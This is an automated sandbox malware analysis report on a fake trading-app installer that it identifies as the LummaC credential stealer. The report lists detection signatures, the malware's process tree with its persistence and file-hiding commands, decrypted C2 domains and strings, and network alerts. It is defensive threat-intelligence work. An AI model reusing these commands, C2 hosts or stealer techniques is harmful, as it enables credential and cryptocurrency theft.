Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
XS_Trade_AI-newest_release_.exe

Overview

General Information

Sample name:XS_Trade_AI-newest_release_.exe
Analysis ID:1543888
MD5:869366922ec1233b2fd7adacb0ce27c3
SHA1:8980ef4149a7b3f357f9d114735e9797cd607e84
SHA256:a0041464eaecdb08119b38f377c919e512610307cd7f994aba11c02112fb6777
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Drops password protected ZIP file
Found pyInstaller with non standard icon
Injects a PE file into a foreign processes
LummaC encrypted strings found
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Uses attrib.exe to hide files
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Connects to a URL shortener service
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables security privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • XS_Trade_AI-newest_release_.exe (PID: 7308 cmdline: "C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exe" MD5: 869366922EC1233B2FD7ADACB0CE27C3)
    • XS_Trade_AI-newest_release_.tmp (PID: 7324 cmdline: "C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmp" /SL5="$402A0,1465419,721408,C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exe" MD5: 797B09E2DCF988B4320DDCDD4CB936F0)
      • XS_Trade_AI-newest_release_.exe (PID: 7408 cmdline: "C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exe" /verysilent /sp- MD5: 869366922EC1233B2FD7ADACB0CE27C3)
        • XS_Trade_AI-newest_release_.tmp (PID: 7424 cmdline: "C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp" /SL5="$20486,1465419,721408,C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exe" /verysilent /sp- MD5: 797B09E2DCF988B4320DDCDD4CB936F0)
          • idp.exe (PID: 7612 cmdline: "C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exe" x "C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\DontSleep_x64.zip" -o"C:\Users\user\AppData\Local\Programs\Common" -y -p55d46ea0c6e974cfc3e82261dac14874a7dd1da6cfe830e2d9f1bdd748695419 MD5: 6482EE0F372469D1190C74BD70D76153)
            • conhost.exe (PID: 7620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7656 cmdline: "cmd.exe" /C attrib +H +S "C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • attrib.exe (PID: 7708 cmdline: attrib +H +S "C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
          • schtasks.exe (PID: 7724 cmdline: "schtasks.exe" /create /xml C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\lang /tn DropboxSyncTaskMachineUA /f MD5: 48C2FE20575769DE916F48EF0676A965)
            • conhost.exe (PID: 7732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7776 cmdline: "C:\Windows\system32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\.cmd"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • taskshosts.exe (PID: 7824 cmdline: C:\Users\user\AppData\Local\programs\common\taskshosts.exe C:\Windows\system32\config\systemprofile\AppData\Local\programs\common\taskshosts.exe MD5: 8055CC6C758BEA5F7084A80810953D28)
    • taskshosts.exe (PID: 7848 cmdline: C:\Users\user\AppData\Local\programs\common\taskshosts.exe C:\Windows\system32\config\systemprofile\AppData\Local\programs\common\taskshosts.exe MD5: 8055CC6C758BEA5F7084A80810953D28)
      • ngentask.exe (PID: 7928 cmdline: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngentask.exe MD5: AE933850C93D3B3001AB21BB65C3EFA1)
  • taskshosts.exe (PID: 8016 cmdline: C:\Users\user\AppData\Local\programs\common\taskshosts.exe MD5: 8055CC6C758BEA5F7084A80810953D28)
    • taskshosts.exe (PID: 8036 cmdline: C:\Users\user\AppData\Local\programs\common\taskshosts.exe MD5: 8055CC6C758BEA5F7084A80810953D28)
      • ngentask.exe (PID: 8052 cmdline: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngentask.exe MD5: AE933850C93D3B3001AB21BB65C3EFA1)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["faulteyotk.site", "dilemmadu.site", "revordirecut.cyou", "goalyfeastz.site", "servicedny.site", "authorisev.site", "contemteny.site", "opposezmny.site", "seallysl.site"], "Build id": "ROmgOO--"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Sigma Signatures

      System Summary

      barindex
      Sigma detected: Suspicious Add Scheduled Task Parent
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "schtasks.exe" /create /xml C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\lang /tn DropboxSyncTaskMachineUA /f, CommandLine: "schtasks.exe" /create /xml C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\lang /tn DropboxSyncTaskMachineUA /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp" /SL5="$20486,1465419,721408,C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exe" /verysilent /sp-, ParentImage: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp, ParentProcessId: 7424, ParentProcessName: XS_Trade_AI-newest_release_.tmp, ProcessCommandLine: "schtasks.exe" /create /xml C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\lang /tn DropboxSyncTaskMachineUA /f, ProcessId: 7724, ProcessName: schtasks.exe
      Sigma detected: Suspicious Schtasks From Env Var Folder
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "schtasks.exe" /create /xml C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\lang /tn DropboxSyncTaskMachineUA /f, CommandLine: "schtasks.exe" /create /xml C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\lang /tn DropboxSyncTaskMachineUA /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp" /SL5="$20486,1465419,721408,C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exe" /verysilent /sp-, ParentImage: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp, ParentProcessId: 7424, ParentProcessName: XS_Trade_AI-newest_release_.tmp, ProcessCommandLine: "schtasks.exe" /create /xml C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\lang /tn DropboxSyncTaskMachineUA /f, ProcessId: 7724, ProcessName: schtasks.exe

      Persistence and Installation Behavior

      barindex
      Sigma detected: Scheduled temp file as task from temp location
      Source: Process startedAuthor: Joe Security: Data: Command: "schtasks.exe" /create /xml C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\lang /tn DropboxSyncTaskMachineUA /f, CommandLine: "schtasks.exe" /create /xml C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\lang /tn DropboxSyncTaskMachineUA /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp" /SL5="$20486,1465419,721408,C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exe" /verysilent /sp-, ParentImage: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp, ParentProcessId: 7424, ParentProcessName: XS_Trade_AI-newest_release_.tmp, ProcessCommandLine: "schtasks.exe" /create /xml C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\lang /tn DropboxSyncTaskMachineUA /f, ProcessId: 7724, ProcessName: schtasks.exe

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-10-28T15:50:07.155702+010020546531A Network Trojan was detected192.168.2.449743104.21.83.166443TCP
      2024-10-28T15:50:08.587832+010020546531A Network Trojan was detected192.168.2.449744104.21.83.166443TCP
      2024-10-28T15:50:19.440889+010020546531A Network Trojan was detected192.168.2.449750104.21.83.166443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-10-28T15:50:07.155702+010020498361A Network Trojan was detected192.168.2.449743104.21.83.166443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-10-28T15:50:08.587832+010020498121A Network Trojan was detected192.168.2.449744104.21.83.166443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-10-28T15:50:15.323831+010020480941Malware Command and Control Activity Detected192.168.2.449748104.21.83.166443TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Found malware configuration
      Source: 21.2.ngentask.exe.400000.0.raw.unpackMalware Configuration Extractor: LummaC {"C2 url": ["faulteyotk.site", "dilemmadu.site", "revordirecut.cyou", "goalyfeastz.site", "servicedny.site", "authorisev.site", "contemteny.site", "opposezmny.site", "seallysl.site"], "Build id": "ROmgOO--"}
      Sample uses string decryption to hide its real strings
      Source: 00000014.00000003.2054675892.000000000A1B1000.00000004.00000020.00020000.00000000.sdmpString decryptor: servicedny.site
      Source: 00000014.00000003.2054675892.000000000A1B1000.00000004.00000020.00020000.00000000.sdmpString decryptor: authorisev.site
      Source: 00000014.00000003.2054675892.000000000A1B1000.00000004.00000020.00020000.00000000.sdmpString decryptor: faulteyotk.site
      Source: 00000014.00000003.2054675892.000000000A1B1000.00000004.00000020.00020000.00000000.sdmpString decryptor: dilemmadu.site
      Source: 00000014.00000003.2054675892.000000000A1B1000.00000004.00000020.00020000.00000000.sdmpString decryptor: contemteny.site
      Source: 00000014.00000003.2054675892.000000000A1B1000.00000004.00000020.00020000.00000000.sdmpString decryptor: goalyfeastz.site
      Source: 00000014.00000003.2054675892.000000000A1B1000.00000004.00000020.00020000.00000000.sdmpString decryptor: opposezmny.site
      Source: 00000014.00000003.2054675892.000000000A1B1000.00000004.00000020.00020000.00000000.sdmpString decryptor: seallysl.site
      Source: 00000014.00000003.2054675892.000000000A1B1000.00000004.00000020.00020000.00000000.sdmpString decryptor: revordirecut.cyou
      Source: 00000014.00000003.2054675892.000000000A1B1000.00000004.00000020.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
      Source: 00000014.00000003.2054675892.000000000A1B1000.00000004.00000020.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
      Source: 00000014.00000003.2054675892.000000000A1B1000.00000004.00000020.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
      Source: 00000014.00000003.2054675892.000000000A1B1000.00000004.00000020.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
      Source: 00000014.00000003.2054675892.000000000A1B1000.00000004.00000020.00020000.00000000.sdmpString decryptor: Workgroup: -
      Source: 00000014.00000003.2054675892.000000000A1B1000.00000004.00000020.00020000.00000000.sdmpString decryptor: ROmgOO--
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_0041D5AF CryptUnprotectData,21_2_0041D5AF
      Source: XS_Trade_AI-newest_release_.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
      Source: unknownHTTPS traffic detected: 104.18.111.161:443 -> 192.168.2.4:49733 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 164.132.58.105:443 -> 192.168.2.4:49734 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 135.181.116.240:443 -> 192.168.2.4:49735 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.83.166:443 -> 192.168.2.4:49743 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.83.166:443 -> 192.168.2.4:49744 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.83.166:443 -> 192.168.2.4:49745 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.83.166:443 -> 192.168.2.4:49746 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.83.166:443 -> 192.168.2.4:49747 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.83.166:443 -> 192.168.2.4:49748 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.83.166:443 -> 192.168.2.4:49749 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.83.166:443 -> 192.168.2.4:49750 version: TLS 1.2
      Source: XS_Trade_AI-newest_release_.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Source: Binary string: D:\a\1\b\bin\win32\_multiprocessing.pdb source: taskshosts.exe, 0000000F.00000003.1928345378.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000013.00000003.2016209279.000000000124E000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: D:\a\1\b\bin\win32\pyexpat.pdb source: taskshosts.exe, 0000000F.00000003.1930484228.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000013.00000003.2018746592.000000000124F000.00000004.00000020.00020000.00000000.sdmp, pyexpat.pyd.19.dr
      Source: Binary string: D:\a\1\b\bin\win32\_uuid.pdb source: taskshosts.exe, 0000000F.00000003.1929016414.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000013.00000003.2017090409.000000000124E000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: D:\a\1\b\bin\win32\_decimal.pdb%% source: taskshosts.exe, 0000000F.00000003.1927843019.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000013.00000003.2015682768.000000000124D000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: D:\a\1\b\bin\win32\_lzma.pdbOO source: taskshosts.exe, 0000000F.00000003.1928187140.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000013.00000003.2016030196.000000000124E000.00000004.00000020.00020000.00000000.sdmp, _lzma.pyd.19.dr, _lzma.pyd.15.dr
      Source: Binary string: D:\a\1\b\bin\win32\_bz2.pdb source: taskshosts.exe, 0000000F.00000003.1927458115.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000013.00000003.2015374967.000000000124D000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: D:\a\1\b\bin\win32\select.pdb source: taskshosts.exe, 0000000F.00000003.1932655139.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000013.00000003.2024149236.000000000124F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.15.dr
      Source: Binary string: D:\a\1\b\bin\win32\_ctypes.pdb source: taskshosts.exe, 0000000F.00000003.1927618857.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000013.00000003.2015504389.000000000124D000.00000004.00000020.00020000.00000000.sdmp, _ctypes.pyd.15.dr
      Source: Binary string: D:\a\1\b\bin\win32\_asyncio.pdb source: taskshosts.exe, 0000000F.00000003.1927313732.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000013.00000003.2015258110.000000000124D000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: D:\a\1\b\bin\win32\_hashlib.pdb source: taskshosts.exe, 0000000F.00000003.1928056108.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000013.00000003.2015874093.000000000124E000.00000004.00000020.00020000.00000000.sdmp, _hashlib.pyd.15.dr
      Source: Binary string: D:\a\1\b\bin\win32\_decimal.pdb source: taskshosts.exe, 0000000F.00000003.1927843019.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000013.00000003.2015682768.000000000124D000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: D:\a\1\b\bin\win32\_lzma.pdb source: taskshosts.exe, 0000000F.00000003.1928187140.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000013.00000003.2016030196.000000000124E000.00000004.00000020.00020000.00000000.sdmp, _lzma.pyd.19.dr, _lzma.pyd.15.dr
      Source: Binary string: D:\a\1\b\bin\win32\_queue.pdb source: taskshosts.exe, 0000000F.00000003.1928565694.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000013.00000003.2016688883.000000000124E000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: D:\a\1\b\bin\win32\unicodedata.pdb source: taskshosts.exe, 0000000F.00000003.1932942812.00000000009A6000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000013.00000003.2025854099.0000000001258000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: D:\a\1\b\bin\win32\_overlapped.pdb source: taskshosts.exe, 0000000F.00000003.1928457624.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000013.00000003.2016484803.000000000124E000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: D:\a\1\b\bin\win32\_socket.pdb source: taskshosts.exe, 0000000F.00000003.1928682372.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000013.00000003.2016815643.000000000124E000.00000004.00000020.00020000.00000000.sdmp, _socket.pyd.19.dr, _socket.pyd.15.dr
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: 6_2_00276CE2 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,6_2_00276CE2
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeCode function: 15_2_006903E2 FindFirstFileExW,GetLastError,FindNextFileW,GetLastError,15_2_006903E2
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeCode function: 16_2_006903E2 FindFirstFileExW,GetLastError,FindNextFileW,GetLastError,16_2_006903E2
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: 6_2_00277904 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,6_2_00277904
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+5A603547h]21_2_00410118
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then mov byte ptr [ebx], dl21_2_00410118
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then movzx ecx, byte ptr [ecx+eax-24F86745h]21_2_00410118
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then mov edx, ecx21_2_00410118
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then mov edx, ecx21_2_00410118
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+5A603547h]21_2_00410130
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then mov byte ptr [ebx], dl21_2_00410130
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then movzx ecx, byte ptr [ecx+eax-24F86745h]21_2_00410130
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then mov edx, ecx21_2_00410130
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then mov edx, ecx21_2_00410130
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then movzx esi, byte ptr [eax]21_2_004441F0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then mov edx, ecx21_2_0044137E
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then mov edx, ecx21_2_004413D5
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then jmp eax21_2_0041D5AF
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then mov edx, eax21_2_0043A97E
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then cmp dword ptr [eax+ebx*8], 7CDE1E50h21_2_0043A97E
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], B62B8D10h21_2_0043A97E
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then mov byte ptr [ebx], cl21_2_0042EB60
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then mov ecx, eax21_2_0042EB60
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then lea edx, dword ptr [eax-80h]21_2_0042EB60
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then movzx ebx, byte ptr [esi+ecx+0000009Ch]21_2_0042EB60
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then movzx ecx, byte ptr [esi+eax+068F7B6Bh]21_2_0042EB60
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then mov dword ptr [esi+04h], eax21_2_0042EB60
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then mov byte ptr [ebx], al21_2_0042EB60
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then mov dword ptr [eax+ebx], 30303030h21_2_00401000
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then mov dword ptr [eax+ebx], 20202020h21_2_00401000
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], B62B8D10h21_2_0043B170
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then jmp edx21_2_004431D0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then xor byte ptr [ecx+ebx], bl21_2_004431D0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-7DC9E524h]21_2_004241E0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then jmp edx21_2_00442EB0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then xor byte ptr [ecx+ebx], bl21_2_00442EB0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then jmp edx21_2_004432C0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then xor byte ptr [ecx+ebx], bl21_2_004432C0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then mov byte ptr [eax+ebx], 00000030h21_2_004012D5
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then mov ecx, ebx21_2_00421333
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then movzx esi, byte ptr [eax]21_2_00444380
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then jmp edx21_2_004433B0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then xor byte ptr [ecx+ebx], bl21_2_004433B0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h21_2_0042E400
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then movzx ebx, byte ptr [esi+ecx+0000009Ch]21_2_0042F4DD
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then movzx ecx, byte ptr [esi+eax+068F7B6Bh]21_2_0042F4DD
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then mov dword ptr [esi+04h], eax21_2_0042F4DD
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then mov byte ptr [ebx], al21_2_0042F4DD
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then mov ebx, eax21_2_0040D500
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then mov word ptr [ebx], ax21_2_0041F510
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then mov byte ptr [esi], cl21_2_0041F510
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-67BC38F0h]21_2_00441648
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then movzx eax, word ptr [esi+ecx]21_2_0043C6D0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then mov word ptr [eax], cx21_2_0041C6E0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx+52B71DE2h]21_2_00441720
